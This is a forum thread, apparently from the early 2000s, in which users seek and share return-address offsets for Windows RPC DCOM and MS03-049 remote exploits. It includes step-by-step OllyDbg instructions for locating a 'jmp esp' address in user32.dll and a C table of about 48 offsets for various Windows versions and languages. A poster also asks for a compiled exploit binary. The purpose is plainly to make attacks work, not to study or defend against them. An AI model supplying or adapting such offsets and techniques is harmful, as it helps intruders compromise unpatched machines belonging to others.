[Basti]

Hi m8s, where can i find other Offsets for the MS03049 - Exploit ( http://www.governmen...?showtopic=4352 ) << this one - or how can i find out..

Im interested if there are WORKING offsets 4 the other SPs and 4 all languages and if there are offsets for NTFS, too. 'Cause this exploit is only for W2k Sp4/Sp1 engl Fat 32.


can anybody help?


greetz basti

[Steffan]

may here U can find what U need if they still have the const. kit to get offesets ...

http://www.m00.ru

C'ya

[barabas]

to find the offset for your version:

Open services.exe with ollydbg
select: View-> executable modules

double click user32.dll

right click and search for command jmp esp.

there you have the offset.

[pupkinvasya]

see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets

[xaph]

If someone programming a 0349 exploits for german sys and win2k's plz post here or pm me

greetz xapH

[barabas]

Quote

see
Windows RPC DCOM Remote Exploit with 48 TARGETS

48 Targets -- 48 Offsets

hahaha...

You think you can use offsets for different dll's for everything?? good luck :D

[xaph]

char winntsp4eng[] = "\xe5\x27\xf3\x77"; /* English winNT sp4 */
char winntsp5cn[] = "\xcf\xda\xee\x77"; /* china winNT sp5 */
char winntsp6cn[] = "\xac\x0e\xf0\x77"; /* china winNT sp6 */
char winntsp6acn[] = "\xc3\xea\xf0\x77"; /* china NT sp6a */
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2knospchi[] = "\x2a\xe3\xe2\x77"; /* china win2k nosp */
char win2ksp1chi[] = "\x8b\x89\xe6\x77"; /* china win2k sp1 */
char win2ksp2chi[] = "\x2b\x49\xe0\x77"; /* china win2k sp2 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2knospjap[] = "\xe5\x27\xf3\x77"; /* Japanese win2k nosp */
char win2ksp1jap[] = "\x8b\x89\xe5\x77"; /* Japanese win2k sp1 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char win2knospkr[] = "\x2a\xe3\xe1\x77"; /* Korea win2k nosp */
char win2ksp1kr[] = "\x8b\x89\xe5\x77"; /* Korea win2k sp1 same offset as win2kjp_sp1 ??*/
char win2ksp2kr[] = "\x2b\x49\xdf\x77"; /* Korea win2k sp2 */
char win2knospmx[] = "\x2a\xe3\xe1\x77"; /* Mexican win2k nosp */
char win2ksp1mx[] = "\x8b\x89\xe8\x77"; /* Mexican win2k sp1 */
char win2knospken[] = "\x4d\x3f\xe3\x77"; /* Kenya win2k sp1 */
char win2ksp1ken[] = "\x8b\x89\xe8\x77"; /* Kenya win2k sp1 */
char win2ksp2ken[] = "\x2b\x49\xe2\x77"; /* Kenya win2k sp1 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
char win2k3nospeng[] = "\xb0\x54\x22\x77"; /* english win2k3 */
char Win2ksp3ger[] = "\x29\x2c\xe3\x77"; /* Germanh win2 sp3 */
char Win2ksp4ger1[] = "\x29\x4c\xe0\x77"; /* German win2 sp4 1 */
char Win2ksp4ger2[] = "\x56\xc2\xe2\x77"; /* German win2 sp4 2 */
char winxpsp1ger[] = "\xfc\x18\xd4\x77"; /* German xp sp1 */
char Win2ksp1fr[] = "\x4b\x3e\xe4\x77" /* French win2k Server SP1 */
char Win2ksp4fr[] = "\x56\xc2\xe2\x77" /* French win2k Server SP4 */
char winxpsp0fr[] = "\x4a\x75\xd4\x77" /* French win xp no sp */
char winxpsp1fr[] = "\xfc\x18\xd4\x77" /* French win xp sp 1 */
char win2ksp3big[] = "\x25\x2b\xaa\x77"
char win2ksp4big[] = "\x29\x4c\xdf\x77"
char winxpsp01big[] = "\xfb\x7b\xa1\x71"

Here you have all offsets from 48 target exploit! Could you plz send me a compiled version too pm me or something I can't compile the source 4 windows cause I dont have those libaries...

greetz XaPH

[320X]

mmm... good job xaph i will test it thnx for the post ;)

[Cyrus]

Quote

to find the offset for your version:

Open services.exe with ollydbg
select: View-> executable modules

double click user32.dll

right click and search for command jmp esp.

there you have the offset.

I did that, my results are:

Found commands, item 1
Address=77D4643D
Disassembly=JMP ESP

And im on Win XP Pro SP1 german.